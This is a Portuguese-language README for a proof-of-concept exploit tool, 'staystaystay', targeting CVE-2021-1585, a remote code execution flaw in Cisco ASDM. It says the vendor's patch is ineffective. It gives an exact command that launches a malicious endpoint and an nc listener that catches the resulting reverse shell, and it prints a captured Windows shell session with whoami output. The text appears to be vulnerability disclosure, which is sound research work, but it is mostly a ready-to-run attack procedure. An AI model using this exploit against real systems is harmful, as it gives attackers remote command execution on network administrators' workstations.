
Prova de Conceito para CVE-2021-1585: Cisco ASA Device Manager RCE
staystaystay é um exploit de prova de conceito para CVE-2021-1585, um problema de homem no meio ou RCE de endpoint malicioso que afeta o Cisco ASA Device Manager (ASDM). O problema foi originalmente descoberto por Malcolm Lashley e divulgado no verão de 2021. No entanto, na época em que eu estava analisando isso, estava sem patch na versão mais recente (ASDM 7.17(1)), e eu tropecei nisso de forma independente.
A Cisco "corrigiu" isso no ASDM 7.18(1.152). Digo "corrigiu" porque este exploit ainda funciona perfeitamente. O usuário só precisará clicar em "Sim". Veja um vídeo abaixo.
Atacantes podem configurar dois tipos de payloads para obter um reverse shell para a vítima:
Se uma vítima conectar o ASDM ao staystaystay, ele injetará o payload configurado resultando em um reverse shell. O reverse shell jjs pode ser capturado com um listener nc típico (ou até mesmo Metasploit, se preferir). A opção Longtime Sunshine exige que o atacante use esse framework.
Como exemplo, o seguinte comando iniciará o staystaystay na porta 8443 com o payload :
jjs./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Assim que a vítima se conectar à porta 8443, um reverse shell será gerado para 10.0.0.2:1270:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
O vídeo a seguir contém um exemplo de exploração com Longtime Sunshine:
O vídeo a seguir demonstra o ataque contra uma versão corrigida:
Um artigo do AttackerKB pode ser encontrado aqui: